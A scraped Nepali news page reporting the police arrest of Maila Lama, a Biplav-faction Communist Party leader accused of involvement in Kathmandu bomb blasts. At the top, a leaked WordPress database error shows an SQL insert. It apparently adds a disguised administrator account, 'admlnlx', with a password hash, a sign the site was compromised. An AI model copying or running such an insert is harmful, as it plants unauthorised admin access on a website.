WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/tj1CVBDlmSROpwMxCgOGFFVRkjpi/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 15:37:04', '', 'admlnlx', 'admlnlx')

नेपाल कमुनिस्ट पार्टी विप्लव समूहका उपत्यका इञ्चार्ज माइला लामा पक्राउ – Gaule Khabar

नेपाल कमुनिस्ट पार्टी विप्लव समूहका उपत्यका इञ्चार्ज माइला लामा पक्राउ

नेपाल कमुनिस्ट पार्टी विप्लव समूहका उपत्यका इञ्चार्ज माइला लामा पक्राउ

गाउँले न्युज, ५ साउन, काठमाडौं । नेपाल कमुनिस्ट पार्टी विप्लव समूहका काठमाडौं उपत्यका व्युरो इन्चार्ज माइला लामालाई प्रहरीले पक्राउ गरेको छ । काँडाघारीबाट शनिबार मध्यराति लामालाई पक्राउ गरिएको हो ।
माइला लामालाई गएराति १२:२० बजे पक्राउ गरिएको महानगरीय अपराध महाशाखाका प्रमुख सहकुल थापाले पुष्टि गरे । लामासँगै रेशम तामाङ पनि पक्राउ परेका छन् । उनीहरुको साथबाट चारवटा मोबाइल र विप्लव समूहको दस्तावेज बरामद भएको थापाले जानकारी दिए । लामा काठमाडौंको विभिन्न ठाउमा भएको बम विस्फोटमा संलग्न रहेको प्रहरीको दाबी छ ।
काठमाडौं सीतापाइलामा बस्दै आएका लामा विप्लव समूहको एक प्रभावशाली नेता हुन् । २०६४ सालको पहिलो संविधानसभा काठमाडौंबाट चुनाव लडे पनि पराजित भएका थिए ।

लामा तत्कालीन माओवादीको जनसाँस्कृतिक महासंघको अध्यक्षसमेत थिए । तर, पार्टी बिभाजनपछि मोहन वैद्य हुँदै उनी विप्लव समूहमा लागेका थिए ।

sourse:onlinekhabaar

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका